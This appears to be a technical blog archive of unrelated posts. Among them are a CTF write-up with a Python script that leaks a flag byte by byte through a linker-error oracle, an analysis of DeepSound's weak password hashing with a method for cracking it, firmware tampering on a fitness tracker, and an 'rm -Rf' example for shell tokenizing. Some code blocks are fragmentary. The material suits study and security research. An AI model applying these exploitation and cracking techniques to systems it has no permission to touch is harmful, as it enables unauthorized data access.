Surround Sound from Apple TV and an Onkyo Receiver

I use an Apple TV (4th Generation) with a decade-old Onkyo HT-R280 receiver in a 5.1-channel surround sound system. I was not getting proper surround sound audio from the Apple TV, so I investigated the correct settings to use. There is some confusion on discussion forums about the correct settings and expected behavior, which this article attempts to clear up.

The first thing to check is the Apple TV’s audio output setting.

On the Apple TV, open the Settings app and navigate to “Video and Audio” and then “Audio Format.” You should set “Change Format” to Off. This lets tvOS choose the best format to send audio to your receiver.

In the bottom left part of the screen, the text will tell you what audio mode that tvOS is using. It might say something like,

Audio will be decoded and sent to your equipment as uncompressed multichannel LPCM.

In this case, you would not see the Dolby logo on your receiver.To make it more confusing, my receiver does display Dolby when it first turns on, but it goes away after the first sound (e.g., navigation click) plays. This can be ignored. This is because the Apple TV is already decoding the Dolby signal and sending the decoded signal to the receiver, rather than sending the Dolby signal through to the receiver.

Let’s move on to the receiver now.

If the receiver has both “A” and “B” sets of speakers, having the “B” speakers on may degrade surround sound output. On my receiver, this limits output to stereo. Use the “A” speakers only.

Next you must select the “listening mode” on the the receiver to properly play each audio channel through the corresponding speaker. My receiver has over two dozen modes which are chosen by four different buttons on the remote: Movie/TV, Music, Game, and Stereo. Only some modes are available depending on the audio signal type. The Display button will show the current mode.

With the Direct or Multichannel listening modes, when you are playing 5.1-channel audio, the sound will play from the correct speakers. You can use the handy Surroud Speaker Check app by Jeff Perrin to verify this.Apple, why isn’t this built in? Cycling with the Display button, you will see the input signal is MCH PCM 5.1.

However, if your audio source is only stereo (the input signal does not say MCH PCM 5.1 but something like PCM fs: 48kHz), these listening modes will play audio only from the front speakers. When the input is stereo, you may want to explore some of the other modes (described in the manual) which send some of the audio signal to the surround speakers.

Happily, my receiver seems to be smart enough to remember which listening mode I want for which input signal type. So I can just play some content with true surround sound and set the desired listening mode, then switch to something stereo and set the listening mode to another.

Here are my findings from a brief test of different content on my Apple TV in January 2020:

  • YouTube does not support surround sound, and you’ll drive yourself crazy trying to test your system through videos that claim to be for this purpose!

  • Apple Music audio is not in surround sound, though one of the music videos I tested with was.

  • Netflix, Amazon Prime Video, and iTunes TV shows and movies all support surround sound for some content. In both Netflix and Amazon Prime Video, a “5.1” icon appears next to the runtime on the summary page.

  • Hulu, at the time of writing, does not support 5.1 surround sound on Apple TV, though they do support it on some devices.

  • Apple’s Trailers app’s movie trailer for Joker (2019) was not in surround sound, but the same trailer in the iTunes Movies app was.

  • AirPlay is an interesting case. If you are using AirPlay Video to play (for example) a surround sound music video, it will play as such on the Apple TV. However if you set a Mac’s audio output device to the Apple TV, and then play the same video (so that the picture is on the Mac’s display, and the audio is going through the Apple TV), the audio will be downgraded to stereo.

hxp 36C3 CTF Compilerbot

This post was originally published on the RPISEC blog.

The server for this challenge accepts C source code and compiles it into an executable using Clang. Our objective is to recover the contents of the flag file, but our code is never executed. The server only tells us whether the compilation was successful and produced no warnings.

The server’s response could serve as an oracle if we are able to guess part of the flag and make the compilation fail or emit a warning if our guess is incorrect.

We threw out any approach that involves #include "flag" because the flag is likely not valid C code, and we didn’t think one could abuse the preprocessor to create a string from the contents of a file, but other teams were successful with this.

Our solution’s starting point is to use inline assembly and the .incbin assembler directive, which includes the given file, or a portion of it, verbatim in the binary. (We first learned about this from write-ups of the Oneline Calc challenge from TokyoWesterns CTF 2019.)

When we use .incbin, the file contents are not embedded until the assembler stage, so we aren’t going to be able to trigger an error dependent on the content of the flag before this stage (or during it).

The last stage, linking, follows the assembler. It transforms the object file produced by the assembler into an executable. This is the stage we should target: we want to produce an object file that the linker either accepts or rejects based on the contents of the flag.

To do this, we need to look at structures in the object file that the linker uses. There are a number of special sections (see elf(5), under “Section header”) which hold control information used by the linker; if one of these sections is invalid, it may cause a linker error.

For example, the GNU ld linker creates a lookup table from .eh_frame sections, and if one of them is not correctly formed, the table generation will fail. We can create a valid section manually with inline assembly:

// create a dummy a Call Frame Information record 
    ".pushsection .eh_frame\n"

    // length of CIE record
    ".long 0x0000000D\n"

    // CIE fields
    ".long 0x00000000\n"
    ".byte 0x01\n"
    ".asciz \"zR\"\n"
    ".byte 0\n"
    ".byte 0\n"
    ".byte 0\n"
    ".byte 0\n"
    ".byte 0\n"


Since the record contains a length field, we could corrupt the .eh_frame by providing a length that is too long or too short, causing the linker to read garbage when it scans the next record. For instance, we could read one byte of the flag file into the least-significant byte of the record length:

    // length of CIE record
    ".incbin \"flag\", 0, 1\n"
    ".byte 0\n"
    ".byte 0\n"
    ".byte 0\n"

If the first byte of the flag has value 13 (carriage return), then the record length is correct and there will be no linker error. But for any other value, we get:

/usr/bin/ld: error in /tmp/test-a17b24.o(.eh_frame); no .eh_frame_hdr table will be created

(Note that the compilation technically succeeds but the challenge server considers any message written to standard error as a failure.)

This can be used as our oracle. To test if the first byte is some value other than 13, we just need to pad the end of the struct:

    // pad extra bytes; linking will succeed if the first byte of the flag
    // is 97 (ASCII 'a')
    ".rept 97 - 13\n"
    ".byte 0\n"

Now we can adjust the amount of padding to change the record size until the linker stops complaining, which indicates that the record size is consistent with its length field, and therefore that the record size equals the value of the first byte of the flag.

This can be repeated for the next byte until the entire flag is recovered.


Thanks to Sophia d’Antoine for fixing an oversight in my exploit code.

#!/usr/bin/env python
import subprocess

payload = r'''
__asm__ (
    ".pushsection .eh_frame\n"

    // length of CIE record, using one byte from flag
    // length must be at least 13
    ".incbin \"flag\", __OFFSET__, 1\n"
    ".rept 3\n"
    ".byte 0\n"

    // 13 bytes of CIE record junk
    ".long 0x00000000\n"
    ".byte 0x01\n"
    ".asciz \"zR\"\n"
    ".byte 0\n"
    ".byte 0\n"
    ".byte 0\n"
    ".byte 0\n"
    ".byte 0\n"

    ".rept __GUESS__ - 13\n"
    ".byte 0\n"


# this runs the compiler locally, running against the challenge server is left
# as an exercise to the reader
def try_compile(code):
    code = 'int main(void) { ' + code + ' }'
    sub = subprocess.Popen(['clang', '-x', 'c', '-o', '/dev/null', '-'],
    stdout, _ = sub.communicate(code)
    return sub.returncode == 0 and stdout.strip() == ''

# test first
code = payload
code = code.replace(r'".incbin \"flag\", __OFFSET__, 1\n"',
                    r'".byte 0x20\n"')
code = code.replace('__GUESS__', '0x20')
assert try_compile(code)

# recover the flag
flag = ''
for flag_offset in range(32):
    for guess in range(0x20, 0x7f):
        code = payload
        code = code.replace('__GUESS__', str(guess))
        code = code.replace('__OFFSET__', str(flag_offset))
        if try_compile(code):
            flag += chr(guess)
        # no guess worked, maybe end of the flag

print('flag is', flag)


Due to an oversight, I initially implemented this exploit against GCC and found a slightly different oracle:

I created a dummy section of a certain number of bytes, and a relocation entry that would increment the byte at a given offset.

GCC, but not Clang, will apply the relocation by the time the final executable is linked. (If you can make this work with Clang, please let me know.)

If the relocation entry’s offset is beyond the bounds of the dummy section, the linker complains:

/usr/bin/ld: /tmp/ccQDGoK1.o(.foo+0x10): reloc against `*UND*': error 4
/usr/bin/ld: final link failed: nonrepresentable section on output
collect2: error: ld returned 1 exit status

We can apply the same general idea as above: use .incbin to read a byte of the flag into the relocation entry’s offset, and adjust the size of the dummy section according to our guess.

__asm__ (
    // create a section of N bytes
    ".pushsection .foo\n"
    ".rept 97\n"
    ".byte 0xFF\n"
    // create a relocation that tries to modify our section at some offset
    // based on a single byte of the flag; if it is out of bounds then the
    // linker will error
    ".align 1\n"

    // offset into .foo -- must not overflow !
    ".incbin \"flag\", 0, 1\n"
    ".rept 7\n"
    ".byte 0\n"

    ".quad 0x000000000000000E\n" // type of reloc: R_X86_64_8
    ".quad 0x0000000000000001\n" // value to add at that offset

Obtaining and Modifying Firmware for the Striiv Fusion

A poor decision was made and I am now the owner of five Striiv Fusion fitness trackers. With a few spares to brick, I wanted to see how far I could get meddling with the tracker’s firmware.

First, I needed to obtain the firmware image. The companion smartphone app is capable of performing an over-the-air update of the tracker, so I tried to learn how the app obtains these updates.

Sniffing the iOS app’s traffic, I could see the tracker’s firmware version being sent during a software update check, but the server answered with a 204 No Content response—the software is already the latest version.

After a few failures modifying the update check request to include an out-of-date version number to see if the server would send me new firmware, I discovered I needed to use one of the earlier version numbers from the release notes. Then:

  "forced_update": true,
  "binary": "UEsDBBQAAAAAAFGL...",
  "zipped": true

The update check API responds with a Base64-encoded Zip file containing a binary file called MCU.bin.

Binwalk was not able to identify any part of the binary, but after a lot of sleuthing and an extraordinarily clumsy teardown, I was able to identify the Nordic Semiconductor nRF51422-QFAAE0 system-on-chip I had previously misidentifed the SoC. which has an ARM Cortex-M0 core. Given the correct architecture, Ghidra’s aggressive instruction finder analysis is able to locate executable code within the plain binary format file.

I have identified a few C standard library routines and toyed, unsuccessfully, with using Ghidra’s Function ID to attribute symbol names to some of the interesting functionality. Still, I wanted to try sending a modified firmware image to the tracker to see if firmware validation would be an obstacle. So I made a small change to one of the strings.

To send the patched firmware to the tracker, I wrote an add-on script for mitmproxy that intercepts the app’s software update check and responds with my own binary.

HTTP Request Translator

I am releasing HTTP Request Translator, a tool for converting HTTP requests between formats, such as from a curl command-line invocation to a Python Requests call. This should be useful for automation, penetration testing, and scraping.

curl '' \
  -XPOST \
  --header 'Content-Type: application/x-www-form-urlencoded'
  --header 'X-Magic-Header: Xyzzy' \
  --data 'key=abscissa'

    'q': 'foo bar',
    'Content-Type': 'application/x-www-form-urlencoded',
    'X-Magic-Header': 'Xyzzy',
    'key': 'abscissa'

It works really well with the Safari Web Inspector to quickly generate code for replaying an XMLHTTPRequest:

Safari Web Inspector

If you are translating from something other than curl, you can just capture the raw HTTP request (say, with Wireshark) and the tool can parse that as well.

I wouldn’t say that the tool is complete; it doesn’t know about some basic things right now (such as cookies) and I don’t expect that I’ll ever have a need to support less common curl options such as --proxy-header. It would be nice to be able to generate JavaScript that makes XHRs, also. But the code should make it pretty easy to contribute support for new features as future use cases call for.

This was my first project using a modern JavaScript toolchain, in particular React, LibSass, and webpack. As such, I’m sure there are things to be improved.

Shell Lexing for Node.js

I published node-shlex, a Node.js package for tokenizing UNIX-like shell commands and performing shell escaping.

var split = require("shlex").split

// returns: [ 'ls', '-al', '/' ]
split('ls -al /')

// returns [ 'rm', '-Rf', '/Volumes/Macintosh HD' ]
split('rm -Rf "/Volumes"/Macintosh\ HD') 

I began by porting the shlex module from the Python Standard Library, originally contributed by Eric S. Raymond. But I found the code to be incomprehensible, with a bewildering state machine and a complex matrix of modes of operation. My rewrite of the main tokenization routine is 45% fewer lines of code, including whitespace and a few comments, but still matches the Python module’s output on over 60 tests.

As an alternative, there is shell-quote, which gets 1.1 million weekly downloads and is used by over 350 other packages. But it seems to be abandoned with several known bugs, and has a half-baked implementation of environment variable interpolation that might lead to unexpected behavior.

Happy GDPR Day

Today, the European Union’s General Data Protection Regulation comes into force. For the past several months, technology companies have been racing to meet its demands, which can involve substantial engineering work to retrofit existing platforms.

My former colleagues at Apple have launched a new self-service Data and Privacy tool and a Privacy Enquiries support website that give customers visibility into (and control over) the information about them that Apple keeps. Recent software updates also added data usage disclosures to inform users when and how their data is being processed. No, The Verge, it has nothing to do with stopping phishing.

As journalists have been trying out these tools, they’ve reported that the company has been true to its word about its devotion to privacy. Jefferson Graham wrote,

The zip file I eventually received from Apple was tiny, only 9 megabytes, compared to 243 MB from Google and 881 MB from Facebook. And there’s not much there, because Apple says the information is primarily kept on your device, not its servers.

This is no accident. Apple engineers go to great lengths to design software that minimizes data collection and protects the user’s information. From end-to-end encrypted iMessage to feats like on-device photo classification and privacy-preserving telemetry, so many features took a more challenging path because it was the right thing to do. And all without apparent sacrifice to usability or capability.

So today, in thanks for their tireless work looking out for our privacy in an industry that, at best, doesn’t seem to care, I sent my friends on the Privacy Engineering team a treat in honor of GDPR Day:

GDPR Day Cake

Betsy Braun, the Bay Area’s most ebullient violinist and music instructor, designed, baked, and decorated this three-layer vanilla buttercream cake for the occasion. Let’s say the layers represent transparency, control, and consent—the delicious foundations of privacy protection. Thank you, Betsy!

Sakura Time-Lapse Camera

It’s cherry blossom season in Japan, and everyone loses their collective minds over it. There are official forecasts of when the trees will bloom. There are different words to describe the progression of the flowers. Admirers flock to tree-lined parks for picnics during the day, and then return again at night for lantern-lit strolls. There are special sweets and even seasonal beer cans.

As I was drifting to sleep one night, I thought about how lovely it would be to watch the bloom arrive and recede in timelapse.

Cherry blossoms in Yoichi, Japan

I remembered I had brought a cheap GoPro knock-off, an APEMAN-brand action cam, so on a lark I tested to see if it could act as a USB webcam—and indeed it can. If you start it up attached to a computer, it asks whether it should act as a video camera or mass storage device.

The SakuraCam began to take shape. I headed to the ¥100 store with the basic parts—the camera, a Raspberry Pi, and a 16000mAh battery pack—and played around with arranging everything in variously-sized plastic organizer boxes, imagining how the cables would be dressed and assessing them for weather resistance. I settled on a shallow toolbox-style one with a handle and toggle latch.

I made a coarse cut to allow the camera lens to stick through the case, then sealed up the gaps with hot glue.In retrospect, the mirror image arrangement would have avoided some problems. The camera’s USB connection doubled as its power supply, and the Raspberry Pi was in turn powered by the battery. A short script invoked fswebcam to capture a frame from the webcam at regular intervals, and purged the oldest frames when the SD card filled up. At one frame per minute sped up to 24 fps, I had enough space to store about 7 minutes’ worth of photos.

SakuraCam Mark I

Everything seemed to have fallen into place until, after a few minutes of testing at 5 fps, the camera reset. And then it reset again after another few minutes. Unluckily, upon reset it returns back to the mass storage / video camera prompt, which requires physical interaction—a hard failure in the field.

Unable to scrounge up another webcam, the project seemed unworkable. I thumbed through the camera’s settings, which include a time-lapse mode, but the interval can’t be set any longer than a few seconds. Then I noticed the Wi-Fi settings, and wondered whether I could use it as an IP camera.

In Wi-Fi mode, the camera creates a wireless network which you join from your smartphone, and then you are able to control the camera via an app. It’s not entirely clear whether there is an official app to do so, but CamKing seemed to be the closest thing, and while it is not the most well-crafted app in existence, it works. It allows remote configuration of some of the camera’s settings, such as the exposure value, and best yet, it can capture still frames at 5K resolution, far exceeding the 1080p I could get from the camera as a USB video device.

The only challenge now was figuring out the protocol for triggering a photo.

I pulled the Android APK for CamKing to decompile it, and found that it talks to a web server at that serves a browsable directory index of the SD card, as well as a video stream on port 8192. Taking photos, changing settings, and so on are done by making a GET request with a corresponding command number:

# Set the clock
$ curl

Amazingly, the web server appears to be HFS, an open source web server for Windows. I was originally led to HFS by the HTTP headers, but dismissed it because it’s a GUI app, and, well, for Windows. Even when the API was returning paths starting A:\, I chalked it up to some confused developer. Then it dawned on me that HFS is running in Wine! Surely this was the most practical solution.

Another trick I learned is that rvictl -s [udid] on macOS will create an rvi# interfaceI wasn’t able to inject any packets, but I tried. that taps the network connection of an iOS device, a handy way to sniff the unencrypted traffic between CamKing and the camera as I mapped out the command numbers.

WireShark sniffing iOS traffic

The APEMAN uses a digital camera SoC from Novatek, a fact that is not well hidden: photos on the SD card are stored in a directory called NOVATEK/, and the USB vendor ID belongs to them. I suspect the SoC is a clone of the Ambarella sports camera SoC, once used in the GoPro, and has found its way into most of the sub-$100 action cams and dashboard cameras with unheard-of brands like Campark and Crosstour. Steven Hiscocks’s web interface to the YI Dash Cam, for instance, uses some of the same command numbers and so likely works with these other devices.

My Python module for communicating with the API is published on GitHub, although the code is very much a rough draft.

Porting the time-lapse script over to the new API was painless. However, as the Raspberry Pi now needs to be on the camera’s Wi-Fi network, I lose SSH access to monitor its status.The camera AP does not support multiple clients. I made two improvements to help:

First, I was able to wrest control over the green activity LED, a small feat on the Raspberry Pi 3 Model B, to blink out a status report after each capture.

Second, I configured the device to automatically join the camera network when it is broadcasting, and rejoin the home network when it goes away. This way I can easily gain debug access simply by powering down the camera.

I did not succeed at powering the camera off of the Raspberry Pi without triggering the USB mode selection menu. (It might be useful to know how in the future, but it wasn’t enough to de-authorize the device using udev.) But since the communication is now wireless, I was able to simply move the Raspberry Pi indoors and power the camera directly from the battery. This also pushed the battery life over 24 hours.

So, where’s the video? Ultimately, I didn’t capture the footage I had hoped for, and I decided to stop investigating histogram matching and tone mapping to improve the quality of the image. Hopefully I’ll be able to use what I’ve learned on another project.

Password recovery on DeepSound steganography

DeepSound is a steganography utility that can hide data inside of audio files. The contents can optionally be protected with a password, in which case DeepSound advertises that it encrypts using AES-256.

Used incorrectly, the security of all cryptographic algorithms, including (or perhaps especially) the beloved AES, can be devastatingly eroded. I took a peek at DeepSound to see if I could find any weaknesses in the way it performs encryption that would allow me recover the payload from a carrier file.

DeepSound screenshot

The first thing I noticed was that DeepSound will only prompt for a password when it is fed an audio file that actually does contain an encrypted payload. This ability to distinguish between encrypted and unencrypted payloads without first providing the password means that there is some metadata that should be easily sifted out of the carrier file. This was my first lead to investigate.

Since DeepSound is written using .NET and not obfuscated, it was possible to decompile the binary and just read the code. As a newcomer to reverse engineering C# apps, I found JetBrains dotPeek to be useful for exploring the decompiled code, and dnSpy to be a helpful debugger.

It was easy to understand from the decompiled code how DeepSound stores the header for its payload inside the audio file using a simple encoding mechanism. Remarkably, the payload remains intact after being transcoded to another format and back. After it has located this header, it checks a flag to see whether the payload is encrypted and prompts for the password if so.

public void AnalyzeStream(Stream stream) {
  if (encrypted) {
    // Extract 20 bytes from the header
    byte[] hdrhash = new byte[20];
    Array.Copy(header, 6, hdrhash, 0, 20);
    // Prompt for the password
    KeyRequiredEventArgs e = new KeyRequiredEventArgs();
    this.OnKeyRequired(this, e);
    if (e.Cancel)
      throw new KeyEnterCanceledException();
    this.Key = e.Key;
    // Check if the SHA-1 hash of the AES key matches what's in the header
    byte[] keyhash = SHA1.Create().ComputeHash(this.aes.Key);
    if (!ArrayTools.CompareArrays(keyhash, hdrhash))
      throw new Exception("Wrong password.");

To validate the entered password, DeepSound computes the SHA-1 hash of some AES key—not the password directly—and compares it to a hash stored in the header. But it isn’t obvious here where this AES key came from; if it were generated with a good password-based key derivation function, for instance, then this scheme might be reasonably secure.

It turns out that the line this.Key = e.Key, which copies the entered password into an instance variable, does more than meets the eye:

public string Key {
  set {
    byte[] buffer = new byte[32];
    Array.Copy(this.encoding.GetBytes(value), buffer,
    this.hash = SHA1.Create().ComputeHash(buffer);
    this.aes.Key = buffer;

A secure PBKDF was too much to hope for: the password is used directly as the AES key, and the SHA-1 of the password, unsalted and uniterated, is what’s written into the audio file.

From here it was easy to write a script to locate the payload in a carrier file and extract the SHA-1 hash from its header. Then it should be possible to crack the password by running a tool like John the Ripper or hashcat, or sometimes just by searching Google.

Except that I overlooked something: The Key setter doesn’t compute the hash of the password directly; it copies it into a 32-byte buffer and computes the hash of that. In effect, it truncates or null-pads the password to a length of 32-bytes first, an idiosyncracy that precludes the use of off-the-shelf tools.

I decided to contribute support for this flavor of SHA-1 hash to John the Ripper, a tool that already knows about the imaginative password hashing schemes used by dozens of software packages. The developers of John have realized that most of these schemes are small variations on one another, whether it’s md5(sha1(password)) or sha1(md5(md5(password))) or what have you. Optimizing each of these algorithms by hand is too time consuming, so they have made a clever system that allows these schemes to be expressed in terms of some primitive building blocks.

For instance, DeepSound’s hashing scheme can be expressed in terms of four of these primitives: First, zero out our buffer. Then copy the password to it. Set the length of the buffer to 32, regardless of how long the password was. Lastly, compute the SHA-1 of the buffer.


Admittedly, finding the right sequence of primitives was not trivial, and there are a number of other switches to flip that I found a bit confusing. But it in the end it took only 8 lines to teach John about the new hashing scheme.

My changes have been contributed back to the John the Ripper community edition, including the script for extracting hashes from carrier files. My thanks to Dhiru Kholia for the code review.

Unbeknown to me, DeepSound was featured in a scene of Mr. Robot, which caught the attention of Alfonso Muñoz. Alfonso has a nice write-up of his blackbox reverse engineering of the payload encoding, in which he noticed another bad flaw: the use of ECB mode for encryption. Even without the password you can see penguins.

Thunderbolt 3 Unblocker

I’ve published Thunderbolt 3 Unblocker, a macOS kernel extension that patches IOThunderboltFamily to disable peripheral compatibility checks. This permits the use of some unsupported peripherals such as the Razer Core external GPU enclosure.

One vendor explained,

Apple has chosen to prevent Thunderbolt 3 devices using currently available controller chips from Texas Instruments from enumerating and functioning on the 2016 MacBook Pros. … Thunderbolt 3 peripherals [released prior to November 2016] which use this controller chip are incompatible with the new 2016 Thunderbolt 3 MacBooks.

These existing devices use Intel’s Thunderbolt 3 chipset (Alpine Ridge) in combination with the first generation of TI USB-C chipset (TPS65982). Apple requires the 2nd generation TPS65983 chipset for peripherals to be compatible.

Of course, patching your kernel to make it do unsupported things is not the most cautious idea, and there is likely a reason why Apple decided to disable this older chipset in the first place.

Previously, Tian Zhang’s TB3 Enabler script could be used to patch the IOThunderboltFamily binary on disk. This technique required that the script be kept in sync with macOS releases. The patch would also need to be reapplied after every system upgrade, and reverting back could be difficult. The runtime patching technique of Thunderbolt 3 Unblocker addresses all of these shortcomings.

One of the contributions of Thunderbolt 3 Unblocker is xnu_override, the small static library that does the patching in the kernel. (A few people also wrote to me to mention Lilu, a larger project with similar goals.) One nice feature of xnu_override is that it can revert all patches when you unload the kext.